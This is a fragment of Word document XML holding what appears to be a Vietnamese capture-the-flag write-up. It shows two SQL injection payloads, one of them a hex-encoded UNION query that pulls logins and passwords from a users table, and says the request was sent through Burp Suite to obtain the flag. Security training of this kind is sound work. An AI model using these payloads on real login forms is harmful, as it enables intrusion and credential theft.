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F8DBC" w14:textId="49B10B6E" w:rsidR="00825125" w:rsidRDefault="00825125">
      <w:r w:rsidRPr="00825125">
        <w:t>' union select 1-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D677574" w14:textId="399E299F" w:rsidR="0077643E" w:rsidRDefault="00825125">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E70604" wp14:editId="7E30E5D7">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1120666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6661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A3EDF" w14:textId="660ACA13" w:rsidR="004C2094" w:rsidRDefault="009B29C2">
      <w:r>
        <w:t xml:space="preserve">Ta thực hiện bắt gói tin bằng burpsuite và </w:t>
      </w:r>
      <w:r w:rsidR="004C2094">
        <w:t>gửi đi, ta có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635C110" w14:textId="70B68932" w:rsidR="00825125" w:rsidRDefault="004C2094">
      <w:r w:rsidRPr="004C2094">
        <w:t>login=-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973E61C" w14:textId="660559FF" w:rsidR="004C2094" w:rsidRDefault="004C2094">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="765A7CED" wp14:editId="0422F9D7">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="198594486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94486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7C4"/>
    <w:rsid w:val="001107C4"/>
    <w:rsid w:val="004C2094"/>
    <w:rsid w:val="0077643E"/>
    <w:rsid w:val="00825125"/>
    <w:rsid w:val="009B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E6B7B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{48417734-E252-4B95-84F1-CC486B055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Anh Kiệt</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Võ Anh Kiệt</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-07T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>